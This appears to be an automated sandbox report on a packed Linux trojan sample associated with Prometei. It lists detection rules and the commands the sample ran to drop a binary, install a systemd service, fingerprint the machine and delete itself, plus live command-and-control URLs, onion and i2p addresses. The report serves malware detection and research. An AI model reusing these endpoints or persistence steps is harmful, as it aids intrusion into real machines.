Source: 6233.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Hacktool_Flooder_f454ec10 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 0297e1ad6e180af85256a175183102776212d324a2ce0c4f32e8a44a2e2e9dad, license = Elastic License v2, threat_name = Linux.Hacktool.Flooder, fingerprint = 2ae5e2c3190a4ce5d238efdb10ac0520987425fb7af52246b6bf948abd0259da, id = f454ec10-7a67-4717-9e95-fecb7c357566, last_modified = 2022-01-26
Source: 6233.1.000000000052d000.0000000001575000.rw-.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26
Source: /usr/sbin/uplugplay, type: DROPPED	Matched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26

Source: classification engine

Classification label: mal100.troj.evad.linELF@0/13@2/0

Data Obfuscation

Sample is packed with UPX

Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Id: UPX 4.24 Copyright (C) 1996-2024 the UPX Team. All Rights Reserved. $

Source: /usr/bin/pidof (PID: 6241)	Directory: //.	Jump to behavior
Source: /usr/bin/pidof (PID: 6255)	Directory: //.	Jump to behavior
Source: /usr/bin/gpg (PID: 6297)	File: /var/lib/fwupd/gnupg/.#lk0x000055ea7eb5bb80.galassia.6297	Jump to behavior
Source: /lib/systemd/systemd-hostnamed (PID: 6298)	Directory: <invalid fd (10)>/..	Jump to behavior
Source: /usr/bin/gpg (PID: 6434)	File: /var/lib/fwupd/gnupg/.#lk0x00005599db685b80.galassia.6434	Jump to behavior
Source: /usr/bin/gpg (PID: 6443)	File: /var/lib/fwupd/gnupg/.#lk0x000055d64eefcb80.galassia.6443	Jump to behavior
Source: /usr/bin/gpg (PID: 6464)	File: /var/lib/fwupd/gnupg/.#lk0x00005575faa70b80.galassia.6464	Jump to behavior

Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/6233/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/6233/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/1582/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/1582/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/3088/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/3088/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/230/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/230/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/110/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/110/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/231/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/231/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/111/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/111/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/232/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/232/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/1579/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/1579/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/112/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/112/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/233/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/233/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/1699/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/1699/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/113/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/113/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/234/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/234/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/1335/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/1335/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/1698/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/1698/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/114/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/114/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/235/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/235/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/1334/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/1334/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/1576/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/1576/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/2302/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/2302/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/115/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/115/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/236/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/236/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/116/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/116/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/237/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/237/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/117/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/117/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/118/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/118/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/910/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/910/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/119/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/119/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/912/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/912/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/10/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/10/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/2307/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/2307/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/11/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/11/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/918/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/918/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/12/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/12/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/13/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/13/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/14/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/14/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/15/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/15/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/16/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/16/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/17/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/17/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/18/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/18/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/1594/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/1594/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/120/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/120/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/121/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/121/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/1349/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/1349/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/1/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/1/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/122/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/122/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/243/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/243/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/123/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/123/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/2/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/2/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/124/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/124/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/3/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/3/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/4/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	File opened: /proc/4/cmdline	Jump to behavior

Source: /tmp/na.elf (PID: 6236)	Shell command executed: sh -c "pgrep na.elf"	Jump to behavior
Source: /tmp/na.elf (PID: 6240)	Shell command executed: sh -c "pidof na.elf"	Jump to behavior
Source: /tmp/na.elf (PID: 6244)	Shell command executed: sh -c "pgrep uplugplay"	Jump to behavior
Source: /tmp/na.elf (PID: 6250)	Shell command executed: sh -c "pgrep upnpsetup"	Jump to behavior
Source: /tmp/na.elf (PID: 6254)	Shell command executed: sh -c "pidof upnpsetup"	Jump to behavior
Source: /tmp/na.elf (PID: 6256)	Shell command executed: sh -c "systemctl daemon-reload"	Jump to behavior
Source: /tmp/na.elf (PID: 6271)	Shell command executed: sh -c "systemctl enable uplugplay.service"	Jump to behavior
Source: /tmp/na.elf (PID: 6278)	Shell command executed: sh -c "systemctl start uplugplay.service"	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6283)	Shell command executed: sh -c "/usr/sbin/uplugplay -Dcomsvc"	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6288)	Shell command executed: sh -c hostnamectl	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6294)	Shell command executed: sh -c hostnamectl	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6437)	Shell command executed: sh -c "dmidecode --type baseboard"	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6440)	Shell command executed: sh -c uptime	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6447)	Shell command executed: sh -c "uname -a"	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6453)	Shell command executed: sh -c "dmidecode --type baseboard"	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6457)	Shell command executed: sh -c "dmidecode --type baseboard"	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6461)	Shell command executed: sh -c dmidecode	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6471)	Shell command executed: sh -c uptime	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6475)	Shell command executed: sh -c "uname -a"	Jump to behavior

Source: /bin/sh (PID: 6237)	Pgrep executable: /usr/bin/pgrep -> pgrep na.elf	Jump to behavior
Source: /bin/sh (PID: 6245)	Pgrep executable: /usr/bin/pgrep -> pgrep uplugplay	Jump to behavior
Source: /bin/sh (PID: 6251)	Pgrep executable: /usr/bin/pgrep -> pgrep upnpsetup	Jump to behavior

Source: /usr/bin/dash (PID: 6211)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.ROSySM6ZUJ /tmp/tmp.PQ2NMYibax /tmp/tmp.YEeAFkFkYw			Jump to behavior
Source: /usr/bin/dash (PID: 6220)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.ROSySM6ZUJ /tmp/tmp.PQ2NMYibax /tmp/tmp.YEeAFkFkYw			Jump to behavior

Source: /bin/sh (PID: 6257)	Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload	Jump to behavior
Source: /bin/sh (PID: 6272)	Systemctl executable: /usr/bin/systemctl -> systemctl enable uplugplay.service	Jump to behavior
Source: /bin/sh (PID: 6279)	Systemctl executable: /usr/bin/systemctl -> systemctl start uplugplay.service	Jump to behavior

Source: /usr/sbin/uplugplay (PID: 6284)	Reads from proc file: /proc/cpuinfo	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6284)	Reads from proc file: /proc/stat	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6284)	Reads from proc file: /proc/meminfo	Jump to behavior

Source: /tmp/na.elf (PID: 6233)

File: /usr/sbin/uplugplay (bits: -v usr: x grp: x all: r)

Jump to behavior

Source: /tmp/na.elf (PID: 6233)

File written: /usr/sbin/uplugplay

Jump to dropped file

Source: submitted sample

Stderr: Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service /lib/systemd/system/uplugplay.service.: exit code = 0

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/na.elf (PID: 6233)

File: /usr/sbin/uplugplay

Jump to dropped file

Executes the "dmidecode" command for reading DMI BIOS info like hardware or serial numbers (indicative of machine fingerprinting or VM-detection)

Source: /bin/sh (PID: 6441)	Dmidecode executable: /usr/sbin/dmidecode dmidecode --type baseboard	Jump to behavior
Source: /bin/sh (PID: 6454)	Dmidecode executable: /usr/sbin/dmidecode dmidecode --type baseboard	Jump to behavior
Source: /bin/sh (PID: 6458)	Dmidecode executable: /usr/sbin/dmidecode dmidecode --type baseboard	Jump to behavior
Source: /bin/sh (PID: 6462)	Dmidecode executable: /usr/sbin/dmidecode dmidecode	Jump to behavior

Sample deletes itself

Source: /tmp/na.elf (PID: 6233)

File: /tmp/na.elf

Jump to behavior

Source: na.elf	Submission file: segment LOAD with 7.6054 entropy (max. 8.0)
Source: na.elf	Submission file: segment LOAD with 7.943 entropy (max. 8.0)
Source: uplugplay.32.dr	Dropped file: segment LOAD with 7.6054 entropy (max. 8.0)
Source: uplugplay.32.dr	Dropped file: segment LOAD with 7.943 entropy (max. 8.0)

Source: /usr/sbin/uplugplay (PID: 6284)

Reads CPU info from proc file: /proc/cpuinfo

Jump to behavior

Source: /usr/bin/pgrep (PID: 6237)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/pgrep (PID: 6245)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/pgrep (PID: 6251)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6284)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/uptime (PID: 6444)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/uptime (PID: 6472)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior

Source: /tmp/na.elf (PID: 6233)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6280)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6284)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uname (PID: 6448)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uname (PID: 6476)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gpg (PID: 6297)	Queries kernel information via 'uname':	Jump to behavior
Source: /lib/systemd/systemd-hostnamed (PID: 6298)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gpg (PID: 6434)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gpg (PID: 6443)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gpg (PID: 6464)	Queries kernel information via 'uname':	Jump to behavior

Language, Device and Operating System Detection

Executes the "dmidecode" command for reading DMI BIOS info like hardware or serial numbers (indicative of machine fingerprinting or VM-detection)

Source: /bin/sh (PID: 6441)	Dmidecode executable: /usr/sbin/dmidecode dmidecode --type baseboard	Jump to behavior
Source: /bin/sh (PID: 6454)	Dmidecode executable: /usr/sbin/dmidecode dmidecode --type baseboard	Jump to behavior
Source: /bin/sh (PID: 6458)	Dmidecode executable: /usr/sbin/dmidecode dmidecode --type baseboard	Jump to behavior
Source: /bin/sh (PID: 6462)	Dmidecode executable: /usr/sbin/dmidecode dmidecode	Jump to behavior

Source: /bin/sh (PID: 6448)	Uname executable: /usr/bin/uname -> uname -a			Jump to behavior
Source: /bin/sh (PID: 6476)	Uname executable: /usr/bin/uname -> uname -a			Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Systemd Service	1 Systemd Service	1 Masquerading	1 OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scripting	Boot or Logon Initialization Scripts	1 File and Directory Permissions Modification	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Hidden Files and Directories	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Obfuscated Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 File Deletion	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	1 Proxy	Scheduled Transfer	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
na.elf	37%	Virustotal		Browse
na.elf	47%	ReversingLabs	Linux.Trojan.Generic
na.elf	100%	Avira	LINUX/GM.Agent.JQ

Dropped Files

Source	Detection	Scanner	Label	Link
/usr/sbin/uplugplay	100%	Avira	LINUX/GM.Agent.JQ
/usr/sbin/uplugplay	47%	ReversingLabs	Linux.Trojan.Generic

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://152.36.128.18/cgi-bin/p.cgi?r=18&i=TO32433452U81Q0F	100%	Avira URL Cloud	malware

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
xinchaodbcfda.net	unknown	unknown	false		high
xinchaodbcfda.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://152.36.128.18/cgi-bin/p.cgi?r=18&i=TO32433452U81Q0F	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.oni	na.elf, 6233.1.000000000052d000.0000000001575000.rw-.sdmp	false	high
http://upx.sf.net	na.elf, uplugplay.32.dr	false	high
http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi	na.elf, 6233.1.000000000052d000.0000000001575000.rw-.sdmp	false	high
https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi	na.elf, 6233.1.000000000052d000.0000000001575000.rw-.sdmp	false	high
http://152.36.128.18/cgi-bin/p.cgi	na.elf, 6233.1.000000000052d000.0000000001575000.rw-.sdmp	false	high
http://dummy.zero/cgi-bin/prometei.cgi	na.elf, 6233.1.000000000052d000.0000000001575000.rw-.sdmp	false	high
http://152.36.128	na.elf, uplugplay.32.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
54.171.230.55	unknown	United States	16509	AMAZON-02US	false
199.232.90.49	unknown	United States	54113	FASTLYUS	false
152.36.128.18	unknown	United States	81	NCRENUS	true
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54.171.230.55	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	eehah4.elf	Get hash	malicious	Unknown	Browse
	vejfa5.elf	Get hash	malicious	Unknown	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	efefa7.elf	Get hash	malicious	Mirai	Browse
	na.elf	Get hash	malicious	Prometei	Browse
199.232.90.49	na.elf	Get hash	malicious	Prometei	Browse
	eehah4.elf	Get hash	malicious	Unknown	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	rjfe686.elf	Get hash	malicious	Unknown	Browse
	efjepc.elf	Get hash	malicious	Unknown	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	sh4.elf	Get hash	malicious	Mirai	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	l7vmra.elf	Get hash	malicious	Unknown	Browse
152.36.128.18	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=21&i=0KXA3CKB50Y3FZ2G
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=34&i=12U3IZI3463W5DSU
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=17&i=N48XL6065T20KG1X
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=16&i=MPGSO2M02W5JRD29
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=15&i=2C8LIU4UMPY4V9GX
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=8&i=ZW3EY4C9I7EDT939
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=12&i=20O993GZ608TF2LT
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=12&i=NMW2TB4FP3N0TG7X
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=12&i=C33JTXWA1V1X43MY
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=8&i=BCV9G8J5W1ENJ0IY
109.202.202.202	kpLwzBouH4.elf	Get hash	malicious	Unknown	Browse	ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CANONICAL-ASGB	rjfe686.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	vejfa5.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
	vjwe68k.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
	pspc.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
AMAZON-02US	vejfa5.elf	Get hash	malicious	Unknown	Browse	34.249.145.219
	na.elf	Get hash	malicious	Prometei	Browse	54.171.230.55
	https://snmk9.mjt.lu/lnk/AbwAACYavtgAAAAAAAAAA9w61AIAAYKJhcUAAAAAAC6lwQBn6to4aszawEFKTWWSkCgledCSEgAq1OY/1/JgYawQoManMiPR4Ur62Q1g/aHR0cHM6Ly9vYXV0aC5neXlwb28uY29tLw	Get hash	malicious	Unknown	Browse	75.2.57.54
	https://snmk9.mjt.lu/lnk/AbwAACYajBAAAAAAAAAAA9w61AIAAYKJhcUAAAAAAC6lwQBn6tiXbUiJAxA3R5mF3vZc6uW8YAAq1OY/1/0kE4ayVm1To7Nm4xnq4WgQ/aHR0cHM6Ly9vYXV0aC5qZW5rZWQuY29tLw	Get hash	malicious	Unknown	Browse	75.2.57.54
	https://1hpkhoi.elnk7.com/9acea2a1c7dc1956b0893779c3ec4a0fh	Get hash	malicious	Unknown	Browse	3.162.103.96
	https://lambda.appcues.net/api/test-mode-redirect?accountId=220136&draftFlowId=540734d2-aafb-43cc-83ea-71d48d56263b	Get hash	malicious	Unknown	Browse	3.162.125.53
	https://snmk9.mjt.lu/lnk/AbwAACYavtgAAAAAAAAAA9w61AIAAYKJhcUAAAAAAC6lwQBn6to4aszawEFKTWWSkCgledCSEgAq1OY/1/JgYawQoManMiPR4Ur62Q1g/aHR0cHM6Ly9vYXV0aC5neXlwb28uY29tLw	Get hash	malicious	Unknown	Browse	108.138.128.83
	https://snmk9.mjt.lu/lnk/AbwAACYavtgAAAAAAAAAA9w61AIAAYKJhcUAAAAAAC6lwQBn6to4aszawEFKTWWSkCgledCSEgAq1OY/1/JgYawQoManMiPR4Ur62Q1g/aHR0cHM6Ly9vYXV0aC5neXlwb28uY29tLw	Get hash	malicious	Unknown	Browse	108.138.128.83
	https://snmk9.mjt.lu/lnk/AbwAACYajBAAAAAAAAAAA9w61AIAAYKJhcUAAAAAAC6lwQBn6tiXbUiJAxA3R5mF3vZc6uW8YAAq1OY/1/0kE4ayVm1To7Nm4xnq4WgQ/aHR0cHM6Ly9vYXV0aC5qZW5rZWQuY29tLw	Get hash	malicious	Unknown	Browse	3.167.112.15
	vjwe68k.elf	Get hash	malicious	Unknown	Browse	34.249.145.219
INIT7CH	rjfe686.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
